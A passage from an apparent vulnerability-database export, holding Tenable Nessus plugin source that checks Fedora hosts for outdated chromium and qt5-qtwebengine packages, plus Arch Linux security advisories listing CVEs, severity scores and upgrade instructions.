\"CVE-2020-6412\", \"CVE-2020-6413\", \"CVE-2020-6414\", \"CVE-2020-6415\", \"CVE-2020-6416\", \"CVE-2020-6417\", \"CVE-2020-6418\", \"CVE-2020-6420\", \"CVE-2020-6422\", \"CVE-2020-6424\", \"CVE-2020-6425\", \"CVE-2020-6426\", \"CVE-2020-6427\", \"CVE-2020-6428\", \"CVE-2020-6429\", \"CVE-2020-6449\");\n script_xref(name:\"FEDORA\", value:\"2020-39e0b8bd14\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0023\");\n\n script_name(english:\"Fedora 30 : chromium (2020-39e0b8bd14)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Update to 80.0.3987.149. Upstream says it fixes '13' security issues,\nbut only lists these CVEs :\n\n - CVE-2020-6422: Use after free in WebGL\n\n - CVE-2020-6424: Use after free in media\n\n - CVE-2020-6425: Insufficient policy enforcement in\n extensions. \n\n - CVE-2020-6426: Inappropriate implementation in V8\n\n - CVE-2020-6427: Use after free in audio\n\n - CVE-2020-6428: Use after free in audio\n\n - CVE-2020-6429: Use after free in audio.\n\n - CVE-2019-20503: Out of bounds read in usersctplib.\n\n - CVE-2020-6449: Use after free in audio\n\n----\n\nUpdate to 80.0.3987.132. Lots of security fixes here. VAAPI re-enabled\nby default except on NVIDIA.\n\nList of CVEs fixed (since last update) :\n\n - CVE-2019-20446\n\n - CVE-2020-6381 \n\n - CVE-2020-6382 \n\n - CVE-2020-6383 \n\n - CVE-2020-6384\n\n - CVE-2020-6385 \n\n - CVE-2020-6386\n\n - CVE-2020-6387 \n\n - CVE-2020-6388\n\n - CVE-2020-6389\n\n - CVE-2020-6390 \n\n - CVE-2020-6391\n\n - CVE-2020-6392 \n\n - CVE-2020-6393\n\n - CVE-2020-6394\n\n - CVE-2020-6395\n\n - CVE-2020-6396 \n\n - CVE-2020-6397 \n\n - CVE-2020-6398\n\n - CVE-2020-6399 \n\n - CVE-2020-6400 \n\n - CVE-2020-6401 \n\n - CVE-2020-6402 \n\n - CVE-2020-6403 \n\n - CVE-2020-6404 \n\n - CVE-2020-6405 \n\n - CVE-2020-6406 \n\n - CVE-2020-6407\n\n - CVE-2020-6408 \n\n - CVE-2020-6409 \n\n - CVE-2020-6410 \n\n - CVE-2020-6411 \n\n - CVE-2020-6412 \n\n - CVE-2020-6413 \n\n - CVE-2020-6414 \n\n - CVE-2020-6415 \n\n - CVE-2020-6416 \n\n - CVE-2020-6417\n\n - CVE-2020-6418\n\n - CVE-2020-6420 \n\n----\n\nUpdate to 79.0.3945.130. Fixes the following security issues :\n\n - CVE-2020-6378\n\n - CVE-2020-6379\n\n - CVE-2020-6380\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2020-39e0b8bd14\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected chromium package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-6449\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:30\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^30([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 30\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC30\", reference:\"chromium-80.0.3987.149-1.fc30\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:30:51", "description": "This update updates QtWebEngine to a snapshot from the Qt 5.6 LTS (long-term support) branch. This is a snapshot of the QtWebEngine that will be included in the bugfix and security release Qt 5.6.3, but only the QtWebEngine component is included in this update.\n\nThe update fixes the following security issues in QtWebEngine 5.6.2:\nCVE-2016-5133, CVE-2016-5147, CVE-2016-5153, CVE-2016-5155, CVE-2016-5161, CVE-2016-5166, CVE-2016-5170, CVE-2016-5171, CVE-2016-5172, CVE-2016-5181, CVE-2016-5185, CVE-2016-5186, CVE-2016-5187, CVE-2016-5188, CVE-2016-5192, CVE-2016-5198, CVE-2016-5205, CVE-2016-5207, CVE-2016-5208, CVE-2016-5214, CVE-2016-5215, CVE-2016-5221, CVE-2016-5222, CVE-2016-5224, CVE-2016-5225, CVE-2016-9650, CVE-2016-9651, CVE-2016-9652, CVE-2017-5006, CVE-2017-5007, CVE-2017-5008, CVE-2017-5009, CVE-2017-5010, CVE-2017-5012, CVE-2017-5015, CVE-2017-5016, CVE-2017-5017, CVE-2017-5019, CVE-2017-5023, CVE-2017-5024, CVE-2017-5025, CVE-2017-5026, CVE-2017-5027, CVE-2017-5029, CVE-2017-5033, CVE-2017-5037, CVE-2017-5044, CVE-2017-5046, CVE-2017-5047, CVE-2017-5048, CVE-2017-5049, CVE-2017-5050, CVE-2017-5051, CVE-2017-5059, CVE-2017-5061, CVE-2017-5062, CVE-2017-5065, CVE-2017-5067, CVE-2017-5069, CVE-2017-5070, CVE-2017-5071, CVE-2017-5075, CVE-2017-5076, CVE-2016-5078, CVE-2017-5083, and CVE-2017-5089.\n\nOther important changes include :\n\n - Based on Chromium 49.0.2623.111 (the version used in QtWebEngine 5.7.x) with security fixes from Chromium up to version 59.0.3071.104. (5.6.2 was based on Chromium 45.0.2554.101 with security fixes from Chromium up to version 52.0.2743.116.)\n\n - All other bug fixes from QtWebEngine 5.7.1 have been backported.\n\nSee http://code.qt.io/cgit/qt/qtwebengine.git/tree/dist/changes-5.6.3?h=5.\n6 for details. (Please note that at the time of this writing, not all security backports are listed in that file yet. The list above is accurate.)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-07-24T00:00:00", "type": "nessus", "title": "Fedora 24 : qt5-qtwebengine (2017-98bed96d12)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5078", "CVE-2016-5133", "CVE-2016-5147", "CVE-2016-5153", "CVE-2016-5155", "CVE-2016-5161", "CVE-2016-5166", "CVE-2016-5170", "CVE-2016-5171", "CVE-2016-5172", "CVE-2016-5181", "CVE-2016-5185", "CVE-2016-5186", "CVE-2016-5187", "CVE-2016-5188", "CVE-2016-5192", "CVE-2016-5198", "CVE-2016-5205", "CVE-2016-5207", "CVE-2016-5208", "CVE-2016-5214", "CVE-2016-5215", "CVE-2016-5221", "CVE-2016-5222", "CVE-2016-5224", "CVE-2016-5225", "CVE-2016-9650", "CVE-2016-9651", "CVE-2016-9652", "CVE-2017-5006", "CVE-2017-5007", "CVE-2017-5008", "CVE-2017-5009", "CVE-2017-5010", "CVE-2017-5012", "CVE-2017-5015", "CVE-2017-5016", "CVE-2017-5017", "CVE-2017-5019", "CVE-2017-5023", "CVE-2017-5024", "CVE-2017-5025", "CVE-2017-5026", "CVE-2017-5027", "CVE-2017-5029", "CVE-2017-5033", "CVE-2017-5037", "CVE-2017-5044", "CVE-2017-5046", "CVE-2017-5047", "CVE-2017-5048", "CVE-2017-5049", "CVE-2017-5050", "CVE-2017-5051", "CVE-2017-5059", "CVE-2017-5061", "CVE-2017-5062", "CVE-2017-5065", "CVE-2017-5067", "CVE-2017-5069", "CVE-2017-5070", "CVE-2017-5071", "CVE-2017-5075", "CVE-2017-5076", "CVE-2017-5083", "CVE-2017-5089"], "modified": "2022-06-08T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:qt5-qtwebengine", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2017-98BED96D12.NASL", "href": "https://www.tenable.com/plugins/nessus/101920", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-98bed96d12.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101920);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2016-5078\",\n \"CVE-2016-5133\",\n \"CVE-2016-5147\",\n \"CVE-2016-5153\",\n \"CVE-2016-5155\",\n \"CVE-2016-5161\",\n \"CVE-2016-5166\",\n \"CVE-2016-5170\",\n \"CVE-2016-5171\",\n \"CVE-2016-5172\",\n \"CVE-2016-5181\",\n \"CVE-2016-5185\",\n \"CVE-2016-5186\",\n \"CVE-2016-5187\",\n \"CVE-2016-5188\",\n \"CVE-2016-5192\",\n \"CVE-2016-5198\",\n \"CVE-2016-5205\",\n \"CVE-2016-5207\",\n \"CVE-2016-5208\",\n \"CVE-2016-5214\",\n \"CVE-2016-5215\",\n \"CVE-2016-5221\",\n \"CVE-2016-5222\",\n \"CVE-2016-5224\",\n \"CVE-2016-5225\",\n \"CVE-2016-9650\",\n \"CVE-2016-9651\",\n \"CVE-2016-9652\",\n \"CVE-2017-5006\",\n \"CVE-2017-5007\",\n \"CVE-2017-5008\",\n \"CVE-2017-5009\",\n \"CVE-2017-5010\",\n \"CVE-2017-5012\",\n \"CVE-2017-5015\",\n \"CVE-2017-5016\",\n \"CVE-2017-5017\",\n \"CVE-2017-5019\",\n \"CVE-2017-5023\",\n \"CVE-2017-5024\",\n \"CVE-2017-5025\",\n \"CVE-2017-5026\",\n \"CVE-2017-5027\",\n \"CVE-2017-5029\",\n \"CVE-2017-5033\",\n \"CVE-2017-5037\",\n \"CVE-2017-5044\",\n \"CVE-2017-5046\",\n \"CVE-2017-5047\",\n \"CVE-2017-5048\",\n \"CVE-2017-5049\",\n \"CVE-2017-5050\",\n \"CVE-2017-5051\",\n \"CVE-2017-5059\",\n \"CVE-2017-5061\",\n \"CVE-2017-5062\",\n \"CVE-2017-5065\",\n \"CVE-2017-5067\",\n \"CVE-2017-5069\",\n \"CVE-2017-5070\",\n \"CVE-2017-5071\",\n \"CVE-2017-5075\",\n \"CVE-2017-5076\",\n \"CVE-2017-5083\",\n \"CVE-2017-5089\"\n );\n script_xref(name:\"FEDORA\", value:\"2017-98bed96d12\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"Fedora 24 : qt5-qtwebengine (2017-98bed96d12)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update updates QtWebEngine to a snapshot from the Qt 5.6 LTS\n(long-term support) branch. This is a snapshot of the QtWebEngine that\nwill be included in the bugfix and security release Qt 5.6.3, but only\nthe QtWebEngine component is included in this update.\n\nThe update fixes the following security issues in QtWebEngine 5.6.2:\nCVE-2016-5133, CVE-2016-5147, CVE-2016-5153, CVE-2016-5155,\nCVE-2016-5161, CVE-2016-5166, CVE-2016-5170, CVE-2016-5171,\nCVE-2016-5172, CVE-2016-5181, CVE-2016-5185, CVE-2016-5186,\nCVE-2016-5187, CVE-2016-5188, CVE-2016-5192, CVE-2016-5198,\nCVE-2016-5205, CVE-2016-5207, CVE-2016-5208, CVE-2016-5214,\nCVE-2016-5215, CVE-2016-5221, CVE-2016-5222, CVE-2016-5224,\nCVE-2016-5225, CVE-2016-9650, CVE-2016-9651, CVE-2016-9652,\nCVE-2017-5006, CVE-2017-5007, CVE-2017-5008, CVE-2017-5009,\nCVE-2017-5010, CVE-2017-5012, CVE-2017-5015, CVE-2017-5016,\nCVE-2017-5017, CVE-2017-5019, CVE-2017-5023, CVE-2017-5024,\nCVE-2017-5025, CVE-2017-5026, CVE-2017-5027, CVE-2017-5029,\nCVE-2017-5033, CVE-2017-5037, CVE-2017-5044, CVE-2017-5046,\nCVE-2017-5047, CVE-2017-5048, CVE-2017-5049, CVE-2017-5050,\nCVE-2017-5051, CVE-2017-5059, CVE-2017-5061, CVE-2017-5062,\nCVE-2017-5065, CVE-2017-5067, CVE-2017-5069, CVE-2017-5070,\nCVE-2017-5071, CVE-2017-5075, CVE-2017-5076, CVE-2016-5078,\nCVE-2017-5083, and CVE-2017-5089.\n\nOther important changes include :\n\n - Based on Chromium 49.0.2623.111 (the version used in\n QtWebEngine 5.7.x) with security fixes from Chromium up\n to version 59.0.3071.104. (5.6.2 was based on Chromium\n 45.0.2554.101 with security fixes from Chromium up to\n version 52.0.2743.116.)\n\n - All other bug fixes from QtWebEngine 5.7.1 have been\n backported.\n\nSee\nhttp://code.qt.io/cgit/qt/qtwebengine.git/tree/dist/changes-5.6.3?h=5.\n6 for details. (Please note that at the time of this writing, not all\nsecurity backports are listed in that file yet. The list above is\naccurate.)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n # http://code.qt.io/cgit/qt/qtwebengine.git/tree/dist/changes-5.6.3?h=5.6\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dfc84d1b\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-98bed96d12\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected qt5-qtwebengine package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:qt5-qtwebengine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"qt5-qtwebengine-5.6.3-0.1.20170712gitee719ad313e564.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"qt5-qtwebengine\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "archlinux": [{"lastseen": "2021-07-28T14:33:59", "description": "Arch Linux Security Advisory ASA-202002-11\n==========================================\n\nSeverity: High\nDate : 2020-02-25\nCVE-ID : CVE-2020-6407 CVE-2020-6418\nPackage : chromium\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1102\n\nSummary\n=======\n\nThe package chromium before version 80.0.3987.122-1 is vulnerable to\nmultiple issues including arbitrary code execution and information\ndisclosure.\n\nResolution\n==========\n\nUpgrade to 80.0.3987.122-1.\n\n# pacman -Syu \"chromium>=80.0.3987.122-1\"\n\nThe problems have been fixed upstream in version 80.0.3987.122.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2020-6407 (information disclosure)\n\nAn out-of-bounds memory access vulnerability has been found in the\nstreams component of chromium before 80.0.3987.122.\n\n- CVE-2020-6418 (arbitrary code execution)\n\nA type confusion vulnerability has been found in the V8 component of\nchromium before 80.0.3987.122.\n\nImpact\n======\n\nA remote attacker can access sensitive information or execute arbitrary\ncode on the affected host.\n\nReferences\n==========\n\nhttps://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html\nhttps://crbug.com/1045931\nhttps://crbug.com/1053604\nhttps://security.archlinux.org/CVE-2020-6407\nhttps://security.archlinux.org/CVE-2020-6418", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-25T00:00:00", "type": "archlinux", "title": "[ASA-202002-11] chromium: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2020-02-25T00:00:00", "id": "ASA-202002-11", "href": "https://security.archlinux.org/ASA-202002-11", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-06T21:46:58", "description": "Arch Linux Security Advisory ASA-201707-4\n=========================================\n\nSeverity: Critical\nDate : 2017-07-04\nCVE-ID : CVE-2017-5070 CVE-2017-5071 CVE-2017-5075 CVE-2017-5076\nCVE-2017-5077 CVE-2017-5078 CVE-2017-5079 CVE-2017-5083\nCVE-2017-5088 CVE-2017-5089\nPackage : qt5-webengine\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-339\n\nSummary\n=======\n\nThe package qt5-webengine before version 5.9.1-1 is vulnerable to\nmultiple issues including arbitrary code execution, arbitrary command\nexecution, information disclosure and content spoofing.\n\nResolution\n==========\n\nUpgrade to 5.9.1-1.\n\n# pacman -Syu \"qt5-webengine>=5.9.1-1\"\n\nThe problems have been fixed upstream in version 5.9.1.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2017-5070 (arbitrary code execution)\n\nA type confusion flaw has been found in the V8 component of the\nChromium browser.\n\n- CVE-2017-5071 (information disclosure)\n\nAn out of bounds read flaw has been found in the V8 component of the\nChromium browser.\n\n- CVE-2017-5075 (information disclosure)\n\nAn information leak flaw has been found in the CSP reporting component\nof the Chromium browser.\n\n- CVE-2017-5076 (content spoofing)\n\nAn address spoofing flaw has been found in the Omnibox component of the\nChromium browser.\n\n- CVE-2017-5077 (arbitrary code execution)\n\nA heap buffer overflow flaw was found in the Skia component of the\nChromium browser.\n\n- CVE-2017-5078 (arbitrary command execution)\n\nA possible command injection flaw has been found in the mailto handling\ncomponent of the Chromium browser.\n\n- CVE-2017-5079 (content spoofing)\n\nA UI spoofing flaw has been found in the Blink component of the\nChromium browser.\n\n- CVE-2017-5083 (content spoofing)\n\nA UI spoofing flaw has been found in the Blink component of the\nChromium browser.\n\n- CVE-2017-5088 (information disclosure)\n\nAn out-of-bounds read vulnerability has been found in the V8 component\nof the Chromium browser < 59.0.3071.104.\n\n- CVE-2017-5089 (content spoofing)\n\nA domain spoofing vulnerability has been found in the Omnibox component\nof the Chromium browser < 59.0.3071.104.\n\nImpact\n======\n\nA remote attacker can access sensitive information, spoof content and\nexecute arbitrary code and commands on the affected host.\n\nReferences\n==========\n\nhttps://github.com/qt/qtwebengine/blob/5.9.1/dist/changes-5.9.1\nhttps://chromereleases.googleblog.com/2017/06/stable-channel-update-for-desktop.html\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=722756\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=715582\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=678776\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=719199\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=716311\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=711020\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=713686\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=714849\nhttps://chromereleases.googleblog.com/2017/06/stable-channel-update-for-desktop_15.html\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=729991\nhttps://bugs.chromium.org/p/chromium/issues/detail?id=714196\nhttps://security.archlinux.org/CVE-2017-5070\nhttps://security.archlinux.org/CVE-2017-5071\nhttps://security.archlinux.org/CVE-2017-5075\nhttps://security.archlinux.org/CVE-2017-5076\nhttps://security.archlinux.org/CVE-2017-5077\nhttps://security.archlinux.org/CVE-2017-5078\nhttps://security.archlinux.org/CVE-2017-5079\nhttps://security.archlinux.org/CVE-2017-5083\nhttps://security.archlinux.org/CVE-2017-5088\nhttps://security.archlinux.org/CVE-2017-5089", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-07-04T00:00:00", "type": "archlinux", "title": "[ASA-201707-4] qt5-webengine: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070", "CVE-2017-5071", "CVE-2017-5075", "CVE-2017-5076", "CVE-2017-5077", "CVE-2017-5078", "CVE-2017-5079", "CVE-2017-5083", "CVE-2017-5088", "CVE-2017-5089"], "modified": "2017-07-04T00:00:00", "id": "ASA-201707-4", "href": "https://security.archlinux.org/ASA-201707-4", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-06T21:47:06", "description": "Arch Linux Security Advisory ASA-201706-8\n=========================================\n\nSeverity: Critical\nDate : 2017-06-07\nCVE-ID : CVE-2017-5070 CVE-2017-5071 CVE-2017-5072 CVE-2017-5073\nCVE-2017-5074 CVE-2017-5075 CVE-2017-5076 CVE-2017-5077\nCVE-2017-5078 CVE-2017-5079 CVE-2017-5080 CVE-2017-5081\nCVE-2017-5082 CVE-2017-5083 CVE-2017-5085 CVE-2017-5086\nPackage : chromium\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-289\n\nSummary\n=======\n\nThe package chromium before version 59.0.3071.86-1 is vulnerable to\nmultiple issues including arbitrary code execution, arbitrary command\nexecution, authentication bypass, content spoofing, information\ndisclosure, cross-site scripting and insufficient validation.\n\nResolution\n==========\n\nUpgrade to 59.0.3071.86-1.\n\n# pacman -Syu \"chromium>=59.0.3071.86-1\"\n\nThe problems have been fixed upstream in version 59.0.3071.86.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2017-5070 (arbitrary code execution)\n\nA type confusion flaw has been found in the V8 component of the\nChromium browser.\n\n- CVE-2017-5071 (information disclosure)\n\nAn out of bounds read flaw has been found in the V8 component of 